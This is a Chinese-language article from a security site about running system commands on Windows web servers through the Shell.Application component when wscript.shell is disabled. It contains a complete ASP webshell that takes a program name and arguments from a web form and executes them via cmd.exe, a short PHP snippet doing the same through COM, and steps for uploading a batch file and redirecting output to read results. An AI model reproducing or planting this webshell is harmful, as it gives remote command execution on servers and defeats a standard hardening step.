频道栏目
首页 > 安全 > 网站安全 > 正文
wscript.shell组件被禁用时 可以用Shell.Application执行命令
2013-08-02 11:18:06      个评论    来源:0day5.com  
收藏   我要投稿
wscript.shell 和 shell.application 这两个组件都是来执行程序的,因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ,忽略了 shell.application 。

 

我们可以首先在一个具有运行权限的目录上传一个bat文件,里面写上我们要运行的命令。然后调用 shell.application 组件运行这个bat。回显可以在bat中用重定向符号 > 到一个文本文件,想看命令的结果去读这个文件就可以了。当然也可以直接调用cmd执行命令。

 

弄出一个不带回显的,用重定向自己去看吧。XP下测试成功。

 

 

<%
On Error Resume Next
Dim theFile, thePath, appPath, appName, appArgs
appPath = Trim(Request("appPath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))

If appName = "" Then
appName = "cmd.exe"
End If
   
If appPath <> "" And Right(appPath, 1) <> "\" Then
appPath = appPath & "\"
End If
   
If LCase(appName) = "cmd.exe" And appArgs <> "" Then
If LCase(Left(appArgs, 2)) <> "/c" Then
appArgs = "/c " & appArgs
End If
Else
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If

Set objShellApp = CreateObject("Shell.Application")
objShellApp.ShellExecute appName, appArgs, appPath, "", 0
%>

<form method=post onSubmit='this.Submit.disabled=true'>
所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>
程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62><br/>
命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62>
<input type=submit name=Submit value=' 运行 '><br/>
<hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/>&nbsp; 程序文件默认为cmd.exe,请自定义路径,参数处直接写命令.<hr/>
</form>

 

今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法

<?php 
$wsh = new COM('Shell.Application') or die("Shell.Application"); 
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe"); 
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。 
?>

 


点击复制链接 与好友分享!回本站首页
相关TAG标签 组件 命令
上一篇:eshop后台大面积sql注入
下一篇:CSRF攻击的应对之道
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站